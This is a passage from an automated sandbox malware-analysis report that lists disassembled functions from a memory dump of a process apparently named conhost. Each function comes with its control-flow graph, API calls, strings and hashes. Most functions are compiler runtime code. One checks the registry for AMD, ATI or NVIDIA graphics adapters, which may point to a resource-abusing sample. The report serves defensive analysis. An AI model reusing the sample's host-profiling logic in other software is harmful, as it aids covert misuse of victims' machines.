                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1cbac0678f4c31276c6e8cfc7a4c0148d61c35e94421a13ea9f3eece4001b650
                                                                      • Instruction ID: 415b9f882188d5ad3faaf230976aa8251a7bbd091ec0b7c3b1e2c449e4c4375c
                                                                      • Opcode Fuzzy Hash: 1cbac0678f4c31276c6e8cfc7a4c0148d61c35e94421a13ea9f3eece4001b650
                                                                      • Instruction Fuzzy Hash: DAE0B6B6A18B84C18614EB52F48005EBB64F7E97C0F50491AFECC53B19CF3CC1A08B40
                                                                      Function 00007FF7780113B8 Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 280COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 339 7ff7780113b8-7ff7780113f7 340 7ff7780113f9-7ff77801141b call 7ff778011335 339->340 341 7ff778011420-7ff778011427 339->341 340->341 343 7ff778011459-7ff7780114b6 call 7ff77801138a 341->343 344 7ff778011429-7ff778011430 341->344 349 7ff7780114b8-7ff7780114eb call 7ff778011335 343->349 350 7ff7780114f0-7ff7780114fe 343->350 345 7ff778011437-7ff778011450 344->345 345->345 347 7ff778011452 345->347 347->343 349->350 352 7ff778011529-7ff7780115c4 call 7ff77801138a call 7ff7780130f4 350->352 353 7ff778011500-7ff778011503 350->353 360 7ff77801163d-7ff778011670 call 7ff778013103 352->360 361 7ff7780115c6-7ff7780115c8 352->361 355 7ff778011507-7ff778011520 353->355 355->355 357 7ff778011522 355->357 357->352 365 7ff7780115cd-7ff778011639 call 7ff7780130f4 360->365 366 7ff778011676 360->366 362 7ff778011934-7ff778011947 361->362 371 7ff77801167b-7ff7780116a2 call 7ff77801310f 365->371 372 7ff77801163b 365->372 368 7ff77801192a-7ff77801192f call 7ff778012fe9 366->368 368->362 376 7ff7780116a8-7ff7780116db 371->376 377 7ff77801191b-7ff778011925 call 7ff778012fe9 371->377 372->360 378 7ff77801170a-7ff778011711 376->378 379 7ff7780116dd-7ff778011705 call 7ff778011335 376->379 377->368 382 7ff778011740-7ff778011755 _wcsnicmp 378->382 383 7ff778011713-7ff77801171a 378->383 379->378 386 7ff778011757-7ff77801176d call 7ff778012fe9 * 2 382->386 387 7ff778011772-7ff778011779 382->387 385 7ff77801171e-7ff778011737 383->385 385->385 388 7ff778011739 385->388 386->362 390 7ff77801177b-7ff77801179d call 7ff778011335 387->390 391 7ff7780117a2-7ff7780117a9 387->391 388->382 390->391 392 7ff7780117d8-7ff7780117ed _wcsnicmp 391->392 393 7ff7780117ab-7ff7780117b2 391->393 392->386 397 7ff7780117f3-7ff7780117fa 392->397 396 7ff7780117b6-7ff7780117cf 393->396 396->396 399 7ff7780117d1 396->399 400 7ff778011827-7ff77801182e 397->400 401 7ff7780117fc-7ff778011822 call 7ff778011335 397->401 399->392 404 7ff77801185d-7ff778011876 _wcsnicmp 400->404 405 7ff778011830-7ff778011837 400->405 401->400 404->386 407 7ff77801187c-7ff7780118a8 404->407 406 7ff77801183b-7ff778011854 405->406 406->406 408 7ff778011856 406->408 409 7ff7780118aa-7ff7780118ce call 7ff778011335 407->409 410 7ff7780118d2-7ff7780118d9 407->410 408->404 409->410 411 7ff778011908-7ff778011915 wcsstr 410->411 412 7ff7780118db-7ff7780118e2 410->412 411->377 411->386 415 7ff7780118e6-7ff7780118ff 412->415 415->415 416 7ff778011901 415->416 416->411
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsnicmp$wcsstr
                                                                      • String ID: 0$@$AMD$ATI$Advanced Micro Devices$NVIDIA$ProviderName$Q$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
                                                                      • API String ID: 950242380-3899023574
                                                                      • Opcode ID: 33f0ca916bca0730c1236287edf8c647ae235d183d39f81f72f65ba9d608b99c
                                                                      • Instruction ID: 3a43ba8ad82f1cbacdd438a78054539335e3505d2d0af8bc0fa8a1b72321ccb2
                                                                      • Opcode Fuzzy Hash: 33f0ca916bca0730c1236287edf8c647ae235d183d39f81f72f65ba9d608b99c
                                                                      • Instruction Fuzzy Hash: 85E15F23E3C68294E721AB11E8013AEEBA0EB44764FA05835DA4C47AD5FF7CF155C728
                                                                      Function 00007FF7780133A4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$ErrorLastProtectQuery
                                                                      • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                      • API String ID: 637304234-2693646698
                                                                      • Opcode ID: 0294247a2917bbc01cfb82afdaa3ca90372f1be4a342fe6e92584acca44915b7
                                                                      • Instruction ID: 36887513a66ab48f8f867f9bf5791d6aee00ec0440987c9b716bb0d5a30bee2e
                                                                      • Opcode Fuzzy Hash: 0294247a2917bbc01cfb82afdaa3ca90372f1be4a342fe6e92584acca44915b7
                                                                      • Instruction Fuzzy Hash: B831A223F36A0246EA00AB51E88116DEB61EB84BA0BA58935DD0D473D4EE3CF485C358
                                                                      Function 00007FF778011B49 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 306COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 439 7ff778011b49-7ff778011b94 440 7ff778011b99-7ff778011bbd call 7ff7780130d9 439->440 443 7ff778011bbf-7ff778011be3 call 7ff77801303a 440->443 444 7ff778011be5-7ff778011be7 440->444 443->440 446 7ff778011bed-7ff778011c03 444->446 447 7ff778011d65-7ff778011d87 call 7ff778013055 444->447 450 7ff778011c0d-7ff778011c21 446->450 455 7ff778011d89 447->455 456 7ff778011d92-7ff778011df8 call 7ff77801308b call 7ff778012d00 447->456 452 7ff778011c27-7ff778011c50 450->452 453 7ff778011d4a-7ff778011d50 450->453 457 7ff778011c8a-7ff778011c91 452->457 458 7ff778011c52-7ff778011c85 call 7ff778011335 452->458 453->447 454 7ff778011d52-7ff778011d5f 453->454 454->447 454->450 455->456 471 7ff778011dfa-7ff778011e1f call 7ff778011335 456->471 472 7ff778011e24-7ff778011e32 456->472 461 7ff778011cbf-7ff778011cd8 wcsncmp 457->461 462 7ff778011c93-7ff778011c9a 457->462 458->457 461->453 463 7ff778011cda-7ff778011d48 call 7ff778013070 461->463 465 7ff778011c9e-7ff778011cb6 462->465 463->447 463->453 465->465 468 7ff778011cb8 465->468 468->461 471->472 474 7ff778011e5c-7ff778011e88 call 7ff778011b25 call 7ff77801138a 472->474 475 7ff778011e34-7ff778011e37 472->475 482 7ff778011e8a-7ff778011ea0 call 7ff77801138a 474->482 483 7ff778011ea2-7ff778011ea8 474->483 476 7ff778011e3b-7ff778011e53 475->476 476->476 478 7ff778011e55 476->478 478->474 485 7ff778011eb0-7ff778011eb3 482->485 483->485 487 7ff778011ecd-7ff778011ed5 485->487 488 7ff778011eb5-7ff778011ecb call 7ff77801138a 485->488 490 7ff778011edd-7ff778011ef5 487->490 488->490 492 7ff778011ef7-7ff778011f0f wcslen 490->492 493 7ff778011f11-7ff778011f16 490->493 494 7ff778011f1c-7ff77801219d call 7ff77801138a call 7ff77801303a * 2 call 7ff77801307c call 7ff778013055 * 2 492->494 493->494
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: wcslenwcsncmp
                                                                      • String ID: 0$X$`
                                                                      • API String ID: 3763518489-2527496196
                                                                      • Opcode ID: 23562979911c12ef5fce7cf321bc9e9db032968407d02d08a5e491cc9e3985b6
                                                                      • Instruction ID: e69d9e43d7ac096deb9c1e7673eae7fde74149a4290f292685476e42e8f0a451
                                                                      • Opcode Fuzzy Hash: 23562979911c12ef5fce7cf321bc9e9db032968407d02d08a5e491cc9e3985b6
                                                                      • Instruction Fuzzy Hash: 25F18F23A29BC181E7709B15E4403AEFBA0FB847A4F505625DAAC47BD9EF7CE184C714
                                                                      Function 00007FF7780134EB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 165memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 507 7ff7780134eb-7ff778013503 508 7ff778013749-7ff778013755 507->508 509 7ff778013509-7ff77801355a call 7ff778013c04 call 7ff778013d50 507->509 514 7ff77801370f-7ff778013718 509->514 515 7ff778013560-7ff778013569 509->515 518 7ff77801371c-7ff778013722 514->518 516 7ff77801357b-7ff77801357e 515->516 517 7ff77801356b-7ff778013577 515->517 519 7ff77801358d-7ff778013591 516->519 520 7ff778013580-7ff77801358b 516->520 517->516 518->508 521 7ff778013724-7ff778013735 518->521 525 7ff7780135bf-7ff7780135c9 519->525 526 7ff778013593 519->526 524 7ff778013595-7ff778013598 520->524 522 7ff778013737-7ff778013742 VirtualProtect 521->522 523 7ff778013744-7ff778013747 521->523 522->523 523->518 524->514 529 7ff77801359e-7ff7780135bd call 7ff7780133a4 524->529 527 7ff7780135cb-7ff7780135e0 525->527 528 7ff7780135e2-7ff7780135e9 525->528 526->520 530 7ff778013639-7ff77801363c 527->530 531 7ff778013676 call 7ff778013340 528->531 529->524 530->514 533 7ff778013642-7ff77801365b 530->533 536 7ff77801367b-7ff77801367e 531->536 537 7ff77801365d 533->537 538 7ff7780136a0-7ff7780136a5 533->538 539 7ff778013669-7ff778013672 536->539 540 7ff778013680-7ff778013683 536->540 537->536 543 7ff77801365f-7ff778013662 537->543 541 7ff7780136ab-7ff7780136ae 538->541 542 7ff7780135fc-7ff778013611 538->542 539->531 540->542 541->542 544 7ff778013617-7ff778013624 542->544 545 7ff7780136b3-7ff7780136bf 542->545 546 7ff7780135ee-7ff7780135f4 543->546 547 7ff778013664-7ff778013667 543->547 549 7ff7780136e9-7ff7780136ef 544->549 550 7ff77801362a-7ff778013634 call 7ff7780133a4 544->550 551 7ff7780136c1-7ff7780136cf 545->551 552 7ff7780136d5-7ff7780136e4 call 7ff778013340 545->552 546->542 548 7ff7780135f6 546->548 547->539 553 7ff778013688-7ff77801368f 547->553 548->542 549->550 557 7ff7780136f5-7ff7780136fe 549->557 550->530 551->544 551->552 552->549 553->542 554 7ff778013695-7ff77801369b 553->554 554->542 557->550 558 7ff778013704-7ff77801370a 557->558 558->550
                                                                      APIs
                                                                      • VirtualProtect.KERNEL32(?,?,00007FF77801A978,00000000,?,?,?,00007FF77801A970,00007FF778011208,?,?,?,00007FF778011313), ref: 00007FF778013742
                                                                      Strings
                                                                      • Unknown pseudo relocation bit size %d., xrefs: 00007FF77801366B
                                                                      • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF7780136DD
                                                                      • Unknown pseudo relocation protocol version %d., xrefs: 00007FF7780135E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                      • API String ID: 544645111-1286557213
                                                                      • Opcode ID: 86afa0e69415522cada0cf88169ad2230cdc9171c62470af168b2c642a5a2027
                                                                      • Instruction ID: a24ffe2a9ff16958761c2defea9fab6ff0499a690e8b5f9a7c37a1f2e1d07300
                                                                      • Opcode Fuzzy Hash: 86afa0e69415522cada0cf88169ad2230cdc9171c62470af168b2c642a5a2027
                                                                      • Instruction Fuzzy Hash: CC619D63F3954285EB10AB15D5402BCFBA0AB40BB8FA68935D91C477D9EE3CF584C728
                                                                      Function 00007FF7780137A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 559 7ff7780137a7-7ff7780137cc 560 7ff7780137ce-7ff7780137d2 559->560 561 7ff7780137d4-7ff7780137d9 559->561 560->561 562 7ff778013821-7ff778013824 560->562 563 7ff7780138d7-7ff7780138e1 561->563 564 7ff7780137df-7ff7780137e4 561->564 567 7ff7780138f1-7ff7780138f7 562->567 565 7ff7780138ef 563->565 566 7ff7780138e3-7ff7780138eb 563->566 568 7ff7780137fc-7ff778013804 564->568 569 7ff7780137e6-7ff7780137eb 564->569 565->567 566->565 568->562 572 7ff778013806-7ff778013811 568->572 570 7ff7780137ed 569->570 571 7ff778013835-7ff778013845 call 7ff778013e70 569->571 574 7ff77801381a-7ff77801381f 570->574 575 7ff7780137ef-7ff7780137f4 570->575 581 7ff778013847-7ff778013851 571->581 582 7ff778013853-7ff77801385b 571->582 572->574 574->562 578 7ff778013829-7ff77801382e 574->578 575->563 577 7ff7780137fa 575->577 577->562 579 7ff77801385f-7ff77801386f signal 578->579 580 7ff778013830 578->580 585 7ff778013871-7ff778013876 579->585 586 7ff778013882-7ff77801388a 579->586 580->563 583 7ff77801387b-7ff778013880 signal 581->583 582->563 584 7ff77801385d 582->584 583->562 587 7ff7780138d0-7ff7780138d2 584->587 585->583 586->563 588 7ff77801388c 586->588 587->562 588->587
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: signal
                                                                      • String ID: CCG
                                                                      • API String ID: 1946981877-1584390748
                                                                      • Opcode ID: b79a72abf1adc2578b04b422d0f49005f5e528498582de0c6da89fdd9eb9cf03
                                                                      • Instruction ID: 49f088da51023d15a6ded47fb78a40adb97cf0d4eb24b7e3920b85d62e890d12
                                                                      • Opcode Fuzzy Hash: b79a72abf1adc2578b04b422d0f49005f5e528498582de0c6da89fdd9eb9cf03
                                                                      • Instruction Fuzzy Hash: BF211763E3D34285FA647795D44137DE982AF45374FBA8D36DA0D822D1EE1CB881C329
                                                                      Function 00007FF778013250 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 590 7ff778013250-7ff778013275 591 7ff778013277-7ff778013282 590->591 592 7ff7780132bb-7ff778013329 call 7ff778013dd0 fprintf 590->592 591->592
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-3474627141
                                                                      • Opcode ID: b8492679bac553f1d76b344d5bad17c63bf03d378e5e6c6ad2dd1f1ba9718450
                                                                      • Instruction ID: 08a94a5484a344ba6ec349b5b77e5ed114c1e9cea60bff698d5bb196d8632be7
                                                                      • Opcode Fuzzy Hash: b8492679bac553f1d76b344d5bad17c63bf03d378e5e6c6ad2dd1f1ba9718450
                                                                      • Instruction Fuzzy Hash: 57119122D18E8482D2119F1CE0013AEF370FF9A359F605722EBC8166A4EF3DE552CB04
                                                                      Function 00007FF778013287 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 595 7ff778013287-7ff778013329 call 7ff778013dd0 fprintf
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-2713391170
                                                                      • Opcode ID: c25b6fb5ebb498f5d8266f824818b51ef2c0b3c32df58b379e07e913b0188dbc
                                                                      • Instruction ID: bc4b8e38a6f64657e6a781e15871a4fa7999df8af0739cce9540f8cb777b5752
                                                                      • Opcode Fuzzy Hash: c25b6fb5ebb498f5d8266f824818b51ef2c0b3c32df58b379e07e913b0188dbc
                                                                      • Instruction Fuzzy Hash: 51F06227828F8482D2119F18E4002AFF770FF9E799F605726EBC9265A4EF2DE502C704
                                                                      Function 00007FF778013290 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-4064033741
                                                                      • Opcode ID: a6e05d0719d9a226eb1572a5a872eae5caac3b2fed66a295f5c7032a268e0805
                                                                      • Instruction ID: 8d6308b0a2ad8cada52f579dcfd85a09314276aeb4e4638d50abcf555864c8be
                                                                      • Opcode Fuzzy Hash: a6e05d0719d9a226eb1572a5a872eae5caac3b2fed66a295f5c7032a268e0805
                                                                      • Instruction Fuzzy Hash: 15F04427828F4482D2119F58E4002AFF770FF9A755F605726EBC926564DF2DD502C714
                                                                      Function 00007FF7780132AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-2187435201
                                                                      • Opcode ID: c9ed7c2e3d482160450769c1ff0e72cefc97edc8508946716ac543fe13f5e388
                                                                      • Instruction ID: fbd30f60990c56cab345db7508cf3a2b5d58b5a4942409cefaa748770c9cc93d
                                                                      • Opcode Fuzzy Hash: c9ed7c2e3d482160450769c1ff0e72cefc97edc8508946716ac543fe13f5e388
                                                                      • Instruction Fuzzy Hash: B2F04F27828F8482D2119F18E4002AFF770FF9A799F605726EBC9265A4EF2DE502C704
                                                                      Function 00007FF778013299 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-4283191376
                                                                      • Opcode ID: 3199eb5275f02423fcae51ffbe391b0cbbf840796bd1e3838004dfcebcb03dfa
                                                                      • Instruction ID: 4407c5e11a9b4781360f17395376c225d29bc11d6c9135b4f344c095d0c130d7
                                                                      • Opcode Fuzzy Hash: 3199eb5275f02423fcae51ffbe391b0cbbf840796bd1e3838004dfcebcb03dfa
                                                                      • Instruction Fuzzy Hash: 13F04F27828F8482D2119F18E4002AFF770FF9A799F605726EBC9265A4EF2DE502C714
                                                                      Function 00007FF7780132A2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.4159499241.00007FF778011000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF778010000, based on PE: true
                                                                      • Associated: 00000013.00000002.4159466357.00007FF778010000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159537963.00007FF778015000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159572063.00007FF778017000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159604920.00007FF77801A000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                      • Associated: 00000013.00000002.4159637114.00007FF77801E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_7ff778010000_conhost.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-4273532761
                                                                      • Opcode ID: d235f4f20999ea0141b5c37e71e27d7b56d2e9f6ab22c2758905faa18072636f
                                                                      • Instruction ID: 003e8b1402837f60a5815f50edc164a4e7da54277b42a5aaa1d1a06c577b102e
                                                                      • Opcode Fuzzy Hash: d235f4f20999ea0141b5c37e71e27d7b56d2e9f6ab22c2758905faa18072636f
                                                                      • Instruction Fuzzy Hash: 7AF06227828F8482D2119F18E4002AFF770FF9E799F605726EBC9265A4EF2DE502C714
                                                                      Function 00007FF7780132B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
